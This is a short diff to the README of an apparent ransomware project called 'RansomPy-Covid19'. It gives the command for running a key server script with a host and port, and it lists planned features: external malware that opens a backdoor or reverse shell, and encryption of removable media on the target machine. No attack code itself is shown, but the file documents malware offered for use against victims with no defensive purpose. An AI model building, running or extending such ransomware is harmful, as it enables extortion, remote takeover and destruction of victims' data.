T-wcs/RansomPy-Covid19/README.md

 For use the script : python ServerKey.py --host <ip_adress> --port <port_number>

 # Improvements to come
-The program uses external malware that will open a backdoor.
+The program uses external malware that will open a backdoor or a reverse shell

 The program will encrypt the removable media connected to the target machine.